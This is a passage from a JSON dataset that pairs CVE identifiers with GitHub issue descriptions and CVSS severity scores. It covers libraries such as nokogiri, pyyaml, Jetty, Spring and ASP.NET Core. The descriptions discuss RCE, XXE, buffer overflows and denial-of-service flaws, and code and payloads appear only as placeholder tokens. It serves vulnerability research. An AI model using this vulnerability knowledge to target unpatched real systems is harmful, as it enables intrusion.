  87153. },
  87154. {
  87155. "CVE_ID": "CVE-2021-3517",
  87156. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/2274",
  87157. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/2274",
  87158. "Repo_new": "sparklemotion/nokogiri",
  87159. "Issue_Created_At": "2021-06-17T21:44:25Z",
  87160. "description": "Investigate libxml2 vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to backport to their distributions using a NUMBERTAG based version. References: URLTAG APITAG that it seems likely these are all backports from NUMBERTAG APITAG which Nokogiri is already using, but this issue exists so that I check that assumption.) History of this notication NUMBERTAG issue created after USN was issued",
  87161. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
  87162. "severity": "HIGH",
  87163. "baseScore": 8.6,
  87164. "impactScore": 4.7,
  87165. "exploitabilityScore": 3.9
  87166. },
  87167. {
  87168. "CVE_ID": "CVE-2019-11068",
  87169. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1892",
  87170. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1892",
  87171. "Repo_new": "sparklemotion/nokogiri",
  87172. "Issue_Created_At": "2019-04-16T03:39:10Z",
  87173. "description": "Investigate Ubuntu libxslt patches in USN NUMBERTAG and USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG URLTAG FILETAG PATHTAG CVETAG .html Summary (kept up to date): Next steps: investigate the medium CVE and upstream commits and determine if the patches have already been applied and if not, whether we should include them in the Nokogiri vendored distribution of libxslt.",
  87174. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87175. "severity": "CRITICAL",
  87176. "baseScore": 9.8,
  87177. "impactScore": 5.9,
  87178. "exploitabilityScore": 3.9
  87179. },
  87180. {
  87181. "CVE_ID": "CVE-2019-16865",
  87182. "Issue_Url_old": "https://github.com/python-pillow/Pillow/issues/4123",
  87183. "Issue_Url_new": "https://github.com/python-pillow/pillow/issues/4123",
  87184. "Repo_new": "python-pillow/pillow",
  87185. "Issue_Created_At": "2019-10-07T14:09:34Z",
  87186. "description": "Question regarding CVETAG . Hi, I am looking at CVETAG NUMBERTAG reported against the new NUMBERTAG release, but the information about it is quite limited and I could not find a specific mention in git log. In addition the Changelog does not seem to mention anything specifically security related. Would it be possible to elaborate a bit about the issue and maybe point to a commit fixing the issue ? Thanks in advance NUMBERTAG URLTAG",
  87187. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87188. "severity": "HIGH",
  87189. "baseScore": 7.5,
  87190. "impactScore": 3.6,
  87191. "exploitabilityScore": 3.9
  87192. },
  87193. {
  87194. "CVE_ID": "CVE-2014-1938",
  87195. "Issue_Url_old": "https://github.com/alex/rply/issues/42",
  87196. "Issue_Url_new": "https://github.com/alex/rply/issues/42",
  87197. "Repo_new": "alex/rply",
  87198. "Issue_Created_At": "2015-09-01T04:42:03Z",
  87199. "description": "CVETAG : still uses /tmp insecurely (forwarding from Debian BTS NUMBERTAG Hello, There has been a security issue reported at Debian against rply. This issue is more than a year old. Can this be fixed by upstream?. CVETAG",
  87200. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  87201. "severity": "MEDIUM",
  87202. "baseScore": 5.5,
  87203. "impactScore": 3.6,
  87204. "exploitabilityScore": 1.8
  87205. },
  87206. {
  87207. "CVE_ID": "CVE-2020-14343",
  87208. "Issue_Url_old": "https://github.com/yaml/pyyaml/issues/420",
  87209. "Issue_Url_new": "https://github.com/yaml/pyyaml/issues/420",
  87210. "Repo_new": "yaml/pyyaml",
  87211. "Issue_Created_At": "2020-07-22T08:18:35Z",
  87212. "description": "APITAG and APITAG still vulnerable to fairly trivial RCE. As of NUMBERTAG APITAG defaults to using APITAG and APITAG is still vulnerable to fairly trivial RCE. Some example payloads: APITAG APITAG CODETAG I do not believe this is entirely fixable unless APITAG finally decided to use secure defaults, and make APITAG equivalent to APITAG APITAG should probably be removed entirely, as I don't see the purpose of it.",
  87213. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87214. "severity": "CRITICAL",
  87215. "baseScore": 9.8,
  87216. "impactScore": 5.9,
  87217. "exploitabilityScore": 3.9
  87218. },
  87219. {
  87220. "CVE_ID": "CVE-2019-5063",
  87221. "Issue_Url_old": "https://github.com/opencv/opencv/issues/16951",
  87222. "Issue_Url_new": "https://github.com/opencv/opencv/issues/16951",
  87223. "Repo_new": "opencv/opencv",
  87224. "Issue_Created_At": "2020-04-02T04:40:24Z",
  87225. "description": "null pointer dereference and buffer overflow: APITAG NUMBERTAG System information (version) APITAG NUMBERTAG Operating System / Platform => Win NUMBERTAG Detailed description There appear to be several places where a nullptr dereference can occur in core(persistence). These have been listed as security vulnerabilities in URLTAG It appears they were fixed in APITAG but not in APITAG NUMBERTAG see issue URLTAG and pull request URLTAG Similarly, another security bug is listed here URLTAG where a buffer overflow can occur. It appears that URLTAG fixes all locations where buffer overflow can happen in master, but in the NUMBERTAG branch and in NUMBERTAG releases, the fixes were not added (ie URLTAG in NUMBERTAG s URLTAG in master) As these are both bugs, can we have these fixes back ported to Open C NUMBERTAG",
  87226. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87227. "severity": "HIGH",
  87228. "baseScore": 8.8,
  87229. "impactScore": 5.9,
  87230. "exploitabilityScore": 2.8
  87231. },
  87232. {
  87233. "CVE_ID": "CVE-2021-44549",
  87234. "Issue_Url_old": "https://github.com/eclipse-ee4j/mail/issues/429",
  87235. "Issue_Url_new": "https://github.com/jakartaee/mail-api/issues/429",
  87236. "Repo_new": "jakartaee/mail-api",
  87237. "Issue_Created_At": "2020-03-13T08:49:10Z",
  87238. "description": "Hostname validation for certificates should be enabled by default. APITAG NUMBERTAG specifications has hostname validation of certificates disabled by default NUMBERTAG This is a very insecure default configuration, and opposite to what would be expected as a default. As part of Jakarta Mail NUMBERTAG this should be changed to be secure by default NUMBERTAG APITAG defaults to false",
  87239. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  87240. "severity": "HIGH",
  87241. "baseScore": 7.4,
  87242. "impactScore": 5.2,
  87243. "exploitabilityScore": 2.2
  87244. },
  87245. {
  87246. "CVE_ID": "CVE-2021-43466",
  87247. "Issue_Url_old": "https://github.com/thymeleaf/thymeleaf-spring/issues/263",
  87248. "Issue_Url_new": "https://github.com/thymeleaf/thymeleaf-spring/issues/263",
  87249. "Repo_new": "thymeleaf/thymeleaf-spring",
  87250. "Issue_Created_At": "2021-11-10T17:39:51Z",
  87251. "description": "High vulnerability issue 'thymeleaf spring5' dependency JAR. Version of Thymeleaf : FILETAG Environment: Spring Boot NUMBERTAG Detailed steps to reproduce your issue: Veracode APITAG Composition Analysis' finds below given High vulnerability issue in all versions of 'thymeleaf spring5' dependency Jars. Any possible workarounds you may have found No High Severity CVETAG URLTAG Template Injection: thymeleaf spring5 is vulnerable to template injection. An attacker can inject malicious input through the render function in APITAG , leading to remote code execution. Can you please look into it ?",
  87252. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87253. "severity": "CRITICAL",
  87254. "baseScore": 9.8,
  87255. "impactScore": 5.9,
  87256. "exploitabilityScore": 3.9
  87257. },
  87258. {
  87259. "CVE_ID": "CVE-2019-17572",
  87260. "Issue_Url_old": "https://github.com/apache/rocketmq/issues/1637",
  87261. "Issue_Url_new": "https://github.com/apache/rocketmq/issues/1637",
  87262. "Repo_new": "apache/rocketmq",
  87263. "Issue_Created_At": "2019-12-04T13:17:26Z",
  87264. "description": "APITAG \u6d4b\u8bd5\u73af\u5883\u6761\u4ef6\uff1a APITAG APITAG NUMBERTAG Windows7 pro NUMBERTAG APITAG NUMBERTAG PATHTAG FILETAG FILETAG",
  87265. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  87266. "severity": "MEDIUM",
  87267. "baseScore": 5.3,
  87268. "impactScore": 1.4,
  87269. "exploitabilityScore": 3.9
  87270. },
  87271. {
  87272. "CVE_ID": "CVE-2022-22950",
  87273. "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/28257",
  87274. "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/28257",
  87275. "Repo_new": "spring-projects/spring-framework",
  87276. "Issue_Created_At": "2022-03-31T08:32:25Z",
  87277. "description": "Improve diagnostics in APITAG for large array creation. Backport of gh NUMBERTAG",
  87278. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  87279. "severity": "MEDIUM",
  87280. "baseScore": 6.5,
  87281. "impactScore": 3.6,
  87282. "exploitabilityScore": 2.8
  87283. },
  87284. {
  87285. "CVE_ID": "CVE-2022-22950",
  87286. "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/28145",
  87287. "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/28145",
  87288. "Repo_new": "spring-projects/spring-framework",
  87289. "Issue_Created_At": "2022-03-08T15:53:04Z",
  87290. "description": "Improve diagnostics in APITAG for large array creation. Attempting to create a large array in a APITAG expression can result in an ERRORTAG . Although the JVM recovers from that, we should throw an exception with a meaningful error message in order to improve diagnostics for the user.",
  87291. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  87292. "severity": "MEDIUM",
  87293. "baseScore": 6.5,
  87294. "impactScore": 3.6,
  87295. "exploitabilityScore": 2.8
  87296. },
  87297. {
  87298. "CVE_ID": "CVE-2016-5007",
  87299. "Issue_Url_old": "https://github.com/spring-projects/spring-security/issues/3964",
  87300. "Issue_Url_new": "https://github.com/spring-projects/spring-security/issues/3964",
  87301. "Repo_new": "spring-projects/spring-security",
  87302. "Issue_Created_At": "2016-07-06T20:46:57Z",
  87303. "description": "Add APITAG We should support a request matcher that integrates with Spring MVC",
  87304. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87305. "severity": "HIGH",
  87306. "baseScore": 7.5,
  87307. "impactScore": 3.6,
  87308. "exploitabilityScore": 3.9
  87309. },
  87310. {
  87311. "CVE_ID": "CVE-2019-17638",
  87312. "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/4936",
  87313. "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/4936",
  87314. "Repo_new": "eclipse/jetty.project",
  87315. "Issue_Created_At": "2020-06-03T14:33:35Z",
  87316. "description": "Response header overflow leads to buffer corruptions in embedded Jetty. Jetty version APITAG (but traced it back to APITAG ) Java version ERRORTAG OS type/version APITAG Description We run several Spring Boot NUMBERTAG applications, originally deployed as WAR files on a standalone Jetty server ( APITAG ). Recently we changed these to use an embedded Jetty server, which included an upgrade to Jetty APITAG . Subsequently, we intermittently observed errors in one of our applications, serving an admin page using webjars. The logs indicated errors such as: ERRORTAG This was a valid request from the client side, but somehow the HTTP method got corrupted. ERRORTAG Truncated this one, see below for an example of a stacktrace. ERRORTAG ERRORTAG The admin page itself would also become highly unresponsive, and some files would fail to be served. A restart of the application would fix the errors, but it would also resolve itself \"eventually\". Moreover, the errors' frequency grew with load, but we couldn't reproduce it consistently. This application in particular was affected the most, but we also observed the errors in other applications. We managed to reproduce the issue by creating an endpoint in which we would explicitly send a response header larger than the configured maximum size ( APITAG ), after which an application would immediately become unresponsive and all aforementioned errors would start appearing. We confirmed this behavior wasn't present in our previous Jetty version APITAG , and found it was first introduced in APITAG . APITAG related to URLTAG This might also be the same issue as observed in URLTAG but APITAG which included the potential fix didn't resolve the issue for us. We have for now resolved this internally by allowing bigger response headers, as we do have a use case for these internally. I have provided below a test that can be used to trigger the behavior. It consists of sending a (too) large response header, after which we concurrently trigger many requests in order to reproduce the behavior. From my testing concurrency is necessary, which could explain why the error was more frequently observed in our webpage (it serves many webjars separately rather than bundling). Lastly, from my brief foray into exploring this issue, in one of the cases I noticed that when the header overflow was triggered, which released the APITAG buffer (but before any error handling was done), this same buffer was used by APITAG , but its limit was set to NUMBERTAG These are two different requests, and could explain the HTTP method corruption for instance. So it seems that somehow the buffer cleanup in case of a header overflow is perhaps not correctly handled. If you need any more information, please do let me know. Example test Please look at the logs to observe the triggered errors. Further below I have also provided some sample stacktraces that can be reproduced by this test. ERRORTAG Example stacktraces ERRORTAG ERRORTAG ERRORTAG",
  87317. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
  87318. "severity": "CRITICAL",
  87319. "baseScore": 9.4,
  87320. "impactScore": 5.5,
  87321. "exploitabilityScore": 3.9
  87322. },
  87323. {
  87324. "CVE_ID": "CVE-2019-10782",
  87325. "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/7468",
  87326. "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/7468",
  87327. "Repo_new": "checkstyle/checkstyle",
  87328. "Issue_Created_At": "2020-01-13T17:42:15Z",
  87329. "description": "Sonar violation: Disable XML external entity (XXE) processing. URLTAG Vulnerability at FILETAG Disable XML external entity (XXE) processing. Reply from Security expert: > Hi Roman, The next line APITAG does disable the loading of external entities when the system property is not configured by the user. URLTAG I would validate that you are using all of the prevention methods suggested in this document here: FILETAG The cases you need to be concerned with are any involving the use of the APITAG If you find any cases you are missing, then you may be vulnerable. In which case, please let me know. Cheers, Jonathan Leitschuh TODO: We need to investigate this to make sure if we are vulnerable",
  87330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  87331. "severity": "MEDIUM",
  87332. "baseScore": 5.3,
  87333. "impactScore": 1.4,
  87334. "exploitabilityScore": 3.9
  87335. },
  87336. {
  87337. "CVE_ID": "CVE-2019-10753",
  87338. "Issue_Url_old": "https://github.com/diffplug/spotless/issues/360",
  87339. "Issue_Url_new": "https://github.com/diffplug/spotless/issues/360",
  87340. "Repo_new": "diffplug/spotless",
  87341. "Issue_Created_At": "2019-02-15T21:29:22Z",
  87342. "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JAR files were compromised, any developers using these could continue to be infected past updating to fix this. URLTAG URLTAG URLTAG This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical; POC code exists already to maliciously compromise jar file inflight. See: URLTAG URLTAG To fix: We need to update our APITAG so that artifacts are resolved over HTTPS instead of HTTP. I've been finding this vulnerability in a lot of places today and have responsibly disclosed it to some of the larger organizations involved: URLTAG",
  87343. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87344. "severity": "MEDIUM",
  87345. "baseScore": 5.9,
  87346. "impactScore": 3.6,
  87347. "exploitabilityScore": 2.2
  87348. },
  87349. {
  87350. "CVE_ID": "CVE-2017-12197",
  87351. "Issue_Url_old": "https://github.com/kohsuke/libpam4j/issues/18",
  87352. "Issue_Url_new": "https://github.com/kohsuke/libpam4j/issues/18",
  87353. "Repo_new": "kohsuke/libpam4j",
  87354. "Issue_Created_At": "2017-06-05T22:05:38Z",
  87355. "description": "libpam4j authenticates invalid accounts. Currently, the call to pam_acct_mgmt is commented out in APITAG Thus any login restrictions configured via PAM account modules are ignored by APITAG This usually affects, among others, settings in PATHTAG (pam_access), /etc/nologin (pam_nologin) and host/service name authorization of pam_ldap. Any return value other than PAM_SUCCESS from pam_acct_mgmt should prevent a successful authentication.",
  87356. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  87357. "severity": "MEDIUM",
  87358. "baseScore": 6.5,
  87359. "impactScore": 3.6,
  87360. "exploitabilityScore": 2.8
  87361. },
  87362. {
  87363. "CVE_ID": "CVE-2021-1723",
  87364. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/170",
  87365. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/170",
  87366. "Repo_new": "dotnet/announcements",
  87367. "Issue_Created_At": "2021-01-12T18:19:41Z",
  87368. "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core and ASP.NET NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists in the way Kestrel parses HTTP NUMBERTAG requests. The security update addresses the vulnerability by fixing the way the Kestrel parses HTTP NUMBERTAG requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or .NET NUMBERTAG application running on .NET Core NUMBERTAG or .NET NUMBERTAG or lower respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG If you are using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you are using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87370. "severity": "HIGH",
  87371. "baseScore": 7.5,
  87372. "impactScore": 3.6,
  87373. "exploitabilityScore": 3.9
  87374. },
  87375. {
  87376. "CVE_ID": "CVE-2020-0603",
  87377. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/403",
  87378. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/403",
  87379. "Repo_new": "aspnet/announcements",
  87380. "Issue_Created_At": "2020-01-14T18:01:38Z",
  87381. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in ASP.NET Core software when the software fails to handle objects in memory. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles in memory. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you are exposed to the vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I fix the issue? First examine the versions of .NET Core you have installed. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG APITAG APITAG Updated runtimes and SDKs For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have multiple runtimes or SDKs installed, you must update all runtimes or SDKs separately. Once you've installed the updated runtime or SDK, restart your apps for the update to take effect. Applications targeting .NET Core runtime Update your runtime and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks then restart your application. Applications targeting .NET Framework First update your .NET Core runtimes and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks . As targeting .NET Framework adds dependencies for various packages you must update the dependencies your application uses, recompile and redeploy your application. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: v Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Brennan Conroy of Microsoft Corporation External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87383. "severity": "HIGH",
  87384. "baseScore": 8.8,
  87385. "impactScore": 5.9,
  87386. "exploitabilityScore": 2.8
  87387. },
  87388. {
  87389. "CVE_ID": "CVE-2019-0564",
  87390. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/334",
  87391. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/334",
  87392. "Repo_new": "aspnet/announcements",
  87393. "Issue_Created_At": "2019-01-08T18:04:59Z",
  87394. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG or APITAG The vulnerable packages affected software are distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG or the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. Applications not using APITAG or APITAG Some of the affected assemblies are also available separately as a APITAG package. If you are not using APITAG or APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive 